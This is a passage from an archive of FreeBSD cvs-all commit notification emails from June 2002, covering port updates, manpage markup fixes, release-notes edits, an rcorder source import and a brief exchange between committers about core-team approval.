freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 7505837B40F; Fri, 21 Jun 2002 05:29:25 -0700 (PDT) Received: (from sobomax@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5LCTPq63637; Fri, 21 Jun 2002 05:29:25 -0700 (PDT) (envelope-from sobomax) Message-Id: <200206211229.g5LCTPq63637@freefall.freebsd.org> From: Maxim Sobolev Date: Fri, 21 Jun 2002 05:29:25 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/lang/librep Makefile distinfo pkg-plist X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG sobomax 2002/06/21 05:29:25 PDT Modified files: lang/librep Makefile distinfo pkg-plist Log: Update to 0.16. Revision Changes Path 1.37 +5 -4 ports/lang/librep/Makefile 1.22 +1 -1 ports/lang/librep/distinfo 1.19 +5 -1 ports/lang/librep/pkg-plist To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 5:30:15 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 8F1B137B415; Fri, 21 Jun 2002 05:30:05 -0700 (PDT) Received: (from sobomax@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5LCU5a63803; Fri, 21 Jun 2002 05:30:05 -0700 (PDT) (envelope-from sobomax) Message-Id: <200206211230.g5LCU5a63803@freefall.freebsd.org> From: Maxim Sobolev Date: Fri, 21 Jun 2002 05:30:05 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/x11-toolkits/rep-gtk Makefile X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG sobomax 2002/06/21 05:30:05 PDT Modified files: x11-toolkits/rep-gtk Makefile Log: Chase librep shlib version bump. Revision Changes Path 1.33 +1 -1 ports/x11-toolkits/rep-gtk/Makefile To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 5:31:45 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 3B36237B43A; Fri, 21 Jun 2002 05:31:21 -0700 (PDT) Received: (from sobomax@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5LCVLr64413; Fri, 21 Jun 2002 05:31:21 -0700 (PDT) (envelope-from sobomax) Message-Id: <200206211231.g5LCVLr64413@freefall.freebsd.org> From: Maxim Sobolev Date: Fri, 21 Jun 2002 05:31:21 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/x11-wm/sawfish Makefile X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG sobomax 2002/06/21 05:31:21 PDT Modified files: x11-wm/sawfish Makefile Log: - Chase librep shlib version bump; - use USE_REINPLACE. Revision Changes Path 1.56 +8 -7 ports/x11-wm/sawfish/Makefile To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 5:46:39 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id BAB1A37B403; Fri, 21 Jun 2002 05:46:34 -0700 (PDT) Received: (from sobomax@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5LCkYl65730; Fri, 21 Jun 2002 05:46:34 -0700 (PDT) (envelope-from sobomax) Message-Id: <200206211246.g5LCkYl65730@freefall.freebsd.org> From: Maxim Sobolev Date: Fri, 21 Jun 2002 05:46:34 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/math/gnumeric Makefile distinfo pkg-plist X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG sobomax 2002/06/21 05:46:34 PDT Modified files: math/gnumeric Makefile distinfo pkg-plist Log: Update to 1.0.8. Revision Changes Path 1.88 +7 -6 ports/math/gnumeric/Makefile 1.48 +1 -1 ports/math/gnumeric/distinfo 1.47 +348 -340 ports/math/gnumeric/pkg-plist To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 6:25:12 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 6A87237B407; Fri, 21 Jun 2002 06:25:09 -0700 (PDT) Received: (from sobomax@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5LDP9G73563; Fri, 21 Jun 2002 06:25:09 -0700 (PDT) (envelope-from sobomax) Message-Id: <200206211325.g5LDP9G73563@freefall.freebsd.org> From: Maxim Sobolev Date: Fri, 21 Jun 2002 06:25:09 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/lang/gnomebasic Makefile ports/lang/gnomebasic/files patch-gbrun::Makefile.in X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG sobomax 2002/06/21 06:25:09 PDT Modified files: lang/gnomebasic Makefile Added files: lang/gnomebasic/files patch-gbrun::Makefile.in Log: Respect CFLAGS instead of always incorporating debugging info into libgbrun shared library, which boosts package size by 10x. Revision Changes Path 1.11 +5 -4 ports/lang/gnomebasic/Makefile 1.1 +14 -0 ports/lang/gnomebasic/files/patch-gbrun::Makefile.in (new) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 6:55:56 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 1047837B408; Fri, 21 Jun 2002 06:55:51 -0700 (PDT) Received: (from green@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5LDtpH76666; Fri, 21 Jun 2002 06:55:51 -0700 (PDT) (envelope-from green) Message-Id: <200206211355.g5LDtpH76666@freefall.freebsd.org> From: Brian Feldman Date: Fri, 21 Jun 2002 06:55:48 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/astro/xearth/files freebsd.committers.markers X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG green 2002/06/21 06:55:45 PDT Modified files: astro/xearth/files freebsd.committers.markers Log: Update for my new location, too. Revision Changes Path 1.98 +1 -1 ports/astro/xearth/files/freebsd.committers.markers To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 8:30:57 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id AA7E437B407; Fri, 21 Jun 2002 08:30:38 -0700 (PDT) Received: (from charnier@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5LFUcD95358; Fri, 21 Jun 2002 08:30:38 -0700 (PDT) (envelope-from charnier) Message-Id: <200206211530.g5LFUcD95358@freefall.freebsd.org> From: Philippe Charnier Date: Fri, 21 Jun 2002 08:30:38 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/usr.bin/fmt fmt.1 src/usr.bin/fstat fstat.1 src/usr.bin/gcore gcore.1 src/usr.bin/getopt getopt.1 src/usr.bin/gprof gprof.1 src/usr.bin/hexdump hexdump.1 od.1 src/usr.bin/indent indent.1 src/usr.bin/ipcrm ipcrm.1 ... X-FreeBSD-CVS-Branch: RELENG_4 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG charnier 2002/06/21 08:30:38 PDT Modified files: (Branch: RELENG_4) usr.bin/fmt fmt.1 usr.bin/fstat fstat.1 usr.bin/gcore gcore.1 usr.bin/getopt getopt.1 usr.bin/gprof gprof.1 usr.bin/hexdump hexdump.1 od.1 usr.bin/indent indent.1 usr.bin/ipcrm ipcrm.1 usr.bin/ipcs ipcs.1 usr.bin/jot jot.1 usr.bin/keylogin keylogin.1 usr.bin/keylogout keylogout.1 usr.bin/killall killall.1 usr.bin/ktrace ktrace.1 usr.bin/lam lam.1 usr.bin/last last.1 usr.bin/lastcomm lastcomm.1 usr.bin/ldd ldd.1 usr.bin/leave leave.1 usr.bin/limits limits.1 usr.bin/lock lock.1 usr.bin/lockf lockf.1 usr.bin/logger logger.1 usr.bin/login login.1 usr.bin/look look.1 usr.bin/lorder lorder.1 usr.bin/m4 m4.1 usr.bin/mail mail.1 usr.bin/make make.1 usr.bin/minigzip minigzip.1 usr.bin/mkdep mkdep.1 usr.bin/mkfifo mkfifo.1 usr.bin/mkstr mkstr.1 usr.bin/mktemp mktemp.1 usr.bin/msgs msgs.1 usr.bin/mt mt.1 usr.bin/ncal ncal.1 usr.bin/ncplogin ncplogin.1 ncplogout.1 usr.bin/objformat objformat.1 usr.bin/pagesize pagesize.1 usr.bin/passwd passwd.1 usr.bin/printenv printenv.1 usr.bin/quota quota.1 usr.bin/ranlib ranlib.1 usr.bin/rlogin rlogin.1 usr.bin/rpcgen rpcgen.1 usr.bin/rpcinfo rpcinfo.8 usr.bin/rs rs.1 usr.bin/rsh rsh.1 usr.bin/rup rup.1 usr.bin/ruptime ruptime.1 usr.bin/script script.1 usr.bin/size size.1 usr.bin/soelim soelim.1 usr.bin/strings strings.1 usr.bin/strip strip.1 usr.bin/su su.1 usr.bin/systat systat.1 usr.bin/talk talk.1 usr.bin/tconv tconv.1 usr.bin/tcopy tcopy.1 usr.bin/telnet telnet.1 usr.bin/tftp tftp.1 usr.bin/tip/tip tip.1 usr.bin/true true.1 usr.bin/truss truss.1 usr.bin/tset tset.1 usr.bin/tsort tsort.1 usr.bin/tty tty.1 usr.bin/uac uac.1 usr.bin/ul ul.1 usr.bin/unifdef unifdef.1 usr.bin/unvis unvis.1 usr.bin/usbhidctl usbhidctl.1 usr.bin/users users.1 usr.bin/vgrind vgrind.1 usr.bin/vis vis.1 usr.bin/wall wall.1 usr.bin/which which.1 usr.bin/whois whois.1 usr.bin/window window.1 usr.bin/xlint/xlint lint.1 usr.bin/xstr xstr.1 usr.bin/yacc yacc.1 usr.bin/yes yes.1 usr.bin/ypcat ypcat.1 usr.bin/ypmatch ypmatch.1 usr.bin/ypwhich ypwhich.1 Log: The .Nm utility Revision Changes Path 1.7.2.3 +6 -2 src/usr.bin/fmt/fmt.1 1.9.2.7 +3 -2 src/usr.bin/fstat/fstat.1 1.8.2.4 +10 -7 src/usr.bin/gcore/gcore.1 1.10.2.4 +10 -7 src/usr.bin/getopt/getopt.1 1.12.2.7 +8 -7 src/usr.bin/gprof/gprof.1 1.9.2.7 +3 -2 src/usr.bin/hexdump/hexdump.1 1.8.2.3 +7 -5 src/usr.bin/hexdump/od.1 1.8.2.6 +22 -14 src/usr.bin/indent/indent.1 1.7.2.4 +3 -2 src/usr.bin/ipcrm/ipcrm.1 1.9.2.3 +2 -2 src/usr.bin/ipcs/ipcs.1 1.8.2.5 +4 -3 src/usr.bin/jot/jot.1 1.5.2.2 +3 -2 src/usr.bin/keylogin/keylogin.1 1.4.2.1 +3 -2 src/usr.bin/keylogout/keylogout.1 1.11.2.9 +3 -2 src/usr.bin/killall/killall.1 1.8.2.8 +1 -1 src/usr.bin/ktrace/ktrace.1 1.4.2.6 +4 -3 src/usr.bin/lam/lam.1 1.6.2.6 +6 -4 src/usr.bin/last/last.1 1.7.2.4 +5 -4 src/usr.bin/lastcomm/lastcomm.1 1.12.2.7 +2 -1 src/usr.bin/ldd/ldd.1 1.4.2.4 +4 -3 src/usr.bin/leave/leave.1 1.14.2.7 +13 -8 src/usr.bin/limits/limits.1 1.4.2.3 +3 -2 src/usr.bin/lock/lock.1 1.7.2.4 +5 -2 src/usr.bin/lockf/lockf.1 1.4.2.6 +6 -6 src/usr.bin/logger/logger.1 1.17.2.2 +6 -4 src/usr.bin/login/login.1 1.6.2.3 +3 -2 src/usr.bin/look/look.1 1.5.2.1 +3 -2 src/usr.bin/lorder/lorder.1 1.10.2.6 +2 -1 src/usr.bin/m4/m4.1 1.18.2.11 +14 -9 src/usr.bin/mail/mail.1 1.29.2.13 +12 -7 src/usr.bin/make/make.1 1.3.2.4 +6 -4 src/usr.bin/minigzip/minigzip.1 1.7.2.6 +4 -3 src/usr.bin/mkdep/mkdep.1 1.6.2.4 +3 -3 src/usr.bin/mkfifo/mkfifo.1 1.7.2.2 +15 -11 src/usr.bin/mkstr/mkstr.1 1.7.2.7 +3 -2 src/usr.bin/mktemp/mktemp.1 1.9.2.6 +13 -9 src/usr.bin/msgs/msgs.1 1.19.2.6 +10 -7 src/usr.bin/mt/mt.1 1.8.2.5 +3 -2 src/usr.bin/ncal/ncal.1 1.4.2.8 +2 -1 src/usr.bin/ncplogin/ncplogin.1 1.3.2.6 +1 -1 src/usr.bin/ncplogin/ncplogout.1 1.3.2.4 +2 -1 src/usr.bin/objformat/objformat.1 1.4.2.3 +4 -3 src/usr.bin/pagesize/pagesize.1 1.18.2.5 +9 -6 src/usr.bin/passwd/passwd.1 1.6.2.9 +11 -7 src/usr.bin/printenv/printenv.1 1.7.2.5 +8 -7 src/usr.bin/quota/quota.1 1.7.2.3 +4 -3 src/usr.bin/ranlib/ranlib.1 1.11.2.7 +9 -5 src/usr.bin/rlogin/rlogin.1 1.12.2.4 +10 -7 src/usr.bin/rpcgen/rpcgen.1 1.5.2.2 +4 -3 src/usr.bin/rpcinfo/rpcinfo.8 1.4.2.5 +6 -4 src/usr.bin/rs/rs.1 1.11.2.5 +7 -5 src/usr.bin/rsh/rsh.1 1.7.2.7 +7 -5 src/usr.bin/rup/rup.1 1.8.2.5 +7 -5 src/usr.bin/ruptime/ruptime.1 1.12.2.4 +10 -7 src/usr.bin/script/script.1 1.5.2.2 +4 -3 src/usr.bin/size/size.1 1.4.2.2 +4 -2 src/usr.bin/soelim/soelim.1 1.4.2.3 +7 -4 src/usr.bin/strings/strings.1 1.7.2.1 +3 -2 src/usr.bin/strip/strip.1 1.17.2.6 +6 -4 src/usr.bin/su/su.1 1.23.2.7 +4 -3 src/usr.bin/systat/systat.1 1.6.2.4 +3 -2 src/usr.bin/talk/talk.1 1.10.2.6 +10 -7 src/usr.bin/tconv/tconv.1 1.7.2.3 +7 -5 src/usr.bin/tcopy/tcopy.1 1.15.2.11 +2 -1 src/usr.bin/telnet/telnet.1 1.4.2.7 +3 -2 src/usr.bin/tftp/tftp.1 1.7.2.7 +28 -19 src/usr.bin/tip/tip/tip.1 1.5.2.5 +1 -1 src/usr.bin/true/true.1 1.5.2.6 +4 -3 src/usr.bin/truss/truss.1 1.5.2.4 +5 -5 src/usr.bin/tset/tset.1 1.7.2.2 +3 -2 src/usr.bin/tsort/tsort.1 1.6.2.1 +3 -1 src/usr.bin/tty/tty.1 1.3.2.7 +4 -2 src/usr.bin/uac/uac.1 1.6.2.4 +4 -3 src/usr.bin/ul/ul.1 1.4.2.5 +13 -9 src/usr.bin/unifdef/unifdef.1 1.5.2.2 +4 -3 src/usr.bin/unvis/unvis.1 1.2.2.2 +4 -2 src/usr.bin/usbhidctl/usbhidctl.1 1.5.2.2 +4 -3 src/usr.bin/users/users.1 1.7.2.3 +7 -5 src/usr.bin/vgrind/vgrind.1 1.6.2.2 +4 -3 src/usr.bin/vis/vis.1 1.3.2.4 +4 -3 src/usr.bin/wall/wall.1 1.16.2.4 +4 -2 src/usr.bin/which/which.1 1.15.2.8 +2 -1 src/usr.bin/whois/whois.1 1.5.2.6 +10 -7 src/usr.bin/window/window.1 1.8.2.7 +12 -6 src/usr.bin/xlint/xlint/lint.1 1.4.2.4 +12 -11 src/usr.bin/xstr/xstr.1 1.10.2.1 +7 -5 src/usr.bin/yacc/yacc.1 1.3.2.4 +4 -3 src/usr.bin/yes/yes.1 1.8.2.5 +3 -2 src/usr.bin/ypcat/ypcat.1 1.8.2.5 +3 -2 src/usr.bin/ypmatch/ypmatch.1 1.4.2.4 +3 -2 src/usr.bin/ypwhich/ypwhich.1 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 8:32:13 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id A157337B40A; Fri, 21 Jun 2002 08:32:10 -0700 (PDT) Received: (from bmah@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5LFWA195685; Fri, 21 Jun 2002 08:32:10 -0700 (PDT) (envelope-from bmah) Message-Id: <200206211532.g5LFWA195685@freefall.freebsd.org> From: "Bruce A. Mah" Date: Fri, 21 Jun 2002 08:32:10 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: doc/share/sgml man-refs.ent X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG bmah 2002/06/21 08:32:10 PDT Modified files: share/sgml man-refs.ent Log: Add a handful of new manpage references. Revision Changes Path 1.145 +5 -0 doc/share/sgml/man-refs.ent To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 8:36:43 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 5AC8737B419; Fri, 21 Jun 2002 08:36:25 -0700 (PDT) Received: (from bmah@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5LFaPP96827; Fri, 21 Jun 2002 08:36:25 -0700 (PDT) (envelope-from bmah) Message-Id: <200206211536.g5LFaPP96827@freefall.freebsd.org> From: "Bruce A. Mah" Date: Fri, 21 Jun 2002 08:36:24 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/release/doc/en_US.ISO8859-1/relnotes/common new.sgml X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG bmah 2002/06/21 08:36:24 PDT Modified files: release/doc/en_US.ISO8859-1/relnotes/common new.sgml Log: New release notes: ng_device(4), UFS2, newfs(8) -O, newgrp(1), pam_ksu(8), uuidgen(1). Updated release notes: libpcap-0.7.1, tcpdump-3.7.1. Also do some markup fixes to recently-added items so that they don't try to use entities for manpages that have been removed, in the spirit of rev. 1.359. Revision Changes Path 1.373 +50 -9 src/release/doc/en_US.ISO8859-1/relnotes/common/new.sgml To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 8:50: 9 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 6D2A337B432; Fri, 21 Jun 2002 08:49:50 -0700 (PDT) Received: (from pat@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5LFno797933; Fri, 21 Jun 2002 08:49:50 -0700 (PDT) (envelope-from pat) Message-Id: <200206211549.g5LFno797933@freefall.freebsd.org> From: Patrick Li Date: Fri, 21 Jun 2002 08:49:50 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/print/pdflib Makefile distinfo ports/print/pdflib/files patch-configure X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG pat 2002/06/21 08:49:50 PDT Modified files: print/pdflib Makefile distinfo print/pdflib/files patch-configure Log: Update to 4.0.3 PR: 39616 Submitted by: maintainer Revision Changes Path 1.19 +3 -5 ports/print/pdflib/Makefile 1.8 +1 -1 ports/print/pdflib/distinfo 1.3 +1 -1 ports/print/pdflib/files/patch-configure To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 8:52:11 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 8F14537B407; Fri, 21 Jun 2002 08:52:05 -0700 (PDT) Received: (from obrien@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5LFq5b98797; Fri, 21 Jun 2002 08:52:05 -0700 (PDT) (envelope-from obrien) Message-Id: <200206211552.g5LFq5b98797@freefall.freebsd.org> From: "David E. O'Brien" Date: Fri, 21 Jun 2002 08:52:05 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sbin/rcorder Makefile X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG obrien 2002/06/21 08:52:05 PDT Modified files: sbin/rcorder Makefile Log: Reduce the -I's as we don't need them all. Revision Changes Path 1.3 +1 -1 src/sbin/rcorder/Makefile To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 8:52:44 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 3C70737B40A; Fri, 21 Jun 2002 08:52:36 -0700 (PDT) Received: (from ijliao@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5LFqaI99030; Fri, 21 Jun 2002 08:52:36 -0700 (PDT) (envelope-from ijliao) Message-Id: <200206211552.g5LFqaI99030@freefall.freebsd.org> From: Ying-Chieh Liao Date: Fri, 21 Jun 2002 08:52:35 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/editors/beav Makefile ports/editors/elvis Makefile ports/editors/em Makefile ports/editors/gmanedit Makefile ports/editors/lfhex Makefile ports/editors/poedit Makefile ports/editors/tamago Makefile ports/editors/ted Makefile ... X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG ijliao 2002/06/21 08:52:35 PDT Modified files: editors/beav Makefile editors/elvis Makefile editors/em Makefile editors/gmanedit Makefile editors/lfhex Makefile editors/poedit Makefile editors/tamago Makefile editors/ted Makefile editors/uemacs Makefile Log: Replace ${PERL} with ${REINPLACE_CMD} PR: 39591 Submitted by: Oliver Braun Revision Changes Path 1.19 +4 -3 ports/editors/beav/Makefile 1.5 +3 -2 ports/editors/elvis/Makefile 1.3 +2 -1 ports/editors/em/Makefile 1.7 +6 -4 ports/editors/gmanedit/Makefile 1.3 +3 -2 ports/editors/lfhex/Makefile 1.11 +5 -4 ports/editors/poedit/Makefile 1.6 +2 -1 ports/editors/tamago/Makefile 1.6 +3 -2 ports/editors/ted/Makefile 1.16 +3 -2 ports/editors/uemacs/Makefile To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 8:56:23 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id AEAEF37B406; Fri, 21 Jun 2002 08:56:16 -0700 (PDT) Received: (from obrien@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5LFuG999641; Fri, 21 Jun 2002 08:56:16 -0700 (PDT) (envelope-from obrien) Message-Id: <200206211556.g5LFuG999641@freefall.freebsd.org> From: "David E. O'Brien" Date: Fri, 21 Jun 2002 08:56:16 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sbin/rcorder - Imported sources X-FreeBSD-CVS-Branch: NETBSD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG obrien 2002/06/21 08:56:16 PDT src/sbin/rcorder - Imported sources Update of /home/ncvs/src/sbin/rcorder In directory freefall.freebsd.org:/c/tmp/cvs-serv99503 Log Message: Sync with NetBSD. * don't whine about non-regular files. It is perfectly normal to keep a CVS or RCS directory in /etc/rc.d. * manpage tweak Status: Vendor Tag: NETBSD Release Tags: head_20020621 U src/sbin/rcorder/Makefile U src/sbin/rcorder/ealloc.c U src/sbin/rcorder/ealloc.h U src/sbin/rcorder/hash.c U src/sbin/rcorder/hash.h U src/sbin/rcorder/rcorder.8 U src/sbin/rcorder/rcorder.c U src/sbin/rcorder/sprite.h No conflicts created by this import To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 9: 2:47 2002 Delivered-To: cvs-all@freebsd.org Received: from dragon.nuxi.com (trang.nuxi.com [66.92.13.169]) by hub.freebsd.org (Postfix) with ESMTP id 1135E37B406; Fri, 21 Jun 2002 09:02:43 -0700 (PDT) Received: from dragon.nuxi.com (obrien@localhost [127.0.0.1]) by dragon.nuxi.com (8.12.3/8.12.2) with ESMTP id g5LG2aP8050564; Fri, 21 Jun 2002 09:02:36 -0700 (PDT) (envelope-from obrien@dragon.nuxi.com) Received: (from obrien@localhost) by dragon.nuxi.com (8.12.4/8.12.3/Submit) id g5LG2aCE050563; Fri, 21 Jun 2002 09:02:36 -0700 (PDT) Date: Fri, 21 Jun 2002 09:02:36 -0700 From: "David O'Brien" To: Poul-Henning Kamp Cc: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: Re: cvs commit: CVSROOT avail Message-ID: <20020621090236.C24032@dragon.nuxi.com> Reply-To: obrien@FreeBSD.org Mail-Followup-To: David O'Brien , Poul-Henning Kamp , cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org References: <200206210010.g5L0A2j06495@freefall.freebsd.org> <29698.1024646470@critter.freebsd.dk> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <29698.1024646470@critter.freebsd.dk>; from phk@critter.freebsd.dk on Fri, Jun 21, 2002 at 10:01:10AM +0200 X-Operating-System: FreeBSD 5.0-CURRENT Organization: The NUXI BSD group X-Pgp-Rsa-Fingerprint: B7 4D 3E E9 11 39 5F A3 90 76 5D 69 58 D9 98 7A X-Pgp-Rsa-Keyid: 1024/34F9F9D5 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Fri, Jun 21, 2002 at 10:01:10AM +0200, Poul-Henning Kamp wrote: > I see no "Approved by: core" in this email ? You said you didn't want all these rules with core having to approve them. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 9:12:35 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 9602137B40E; Fri, 21 Jun 2002 09:12:30 -0700 (PDT) Received: (from lioux@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5LGCU205475; Fri, 21 Jun 2002 09:12:30 -0700 (PDT) (envelope-from lioux) Message-Id: <200206211612.g5LGCU205475@freefall.freebsd.org> From: Mario Sergio Fujikawa Ferreira Date: Fri, 21 Jun 2002 09:12:30 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/net/ipcheck Makefile distinfo X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG lioux 2002/06/21 09:12:30 PDT Modified 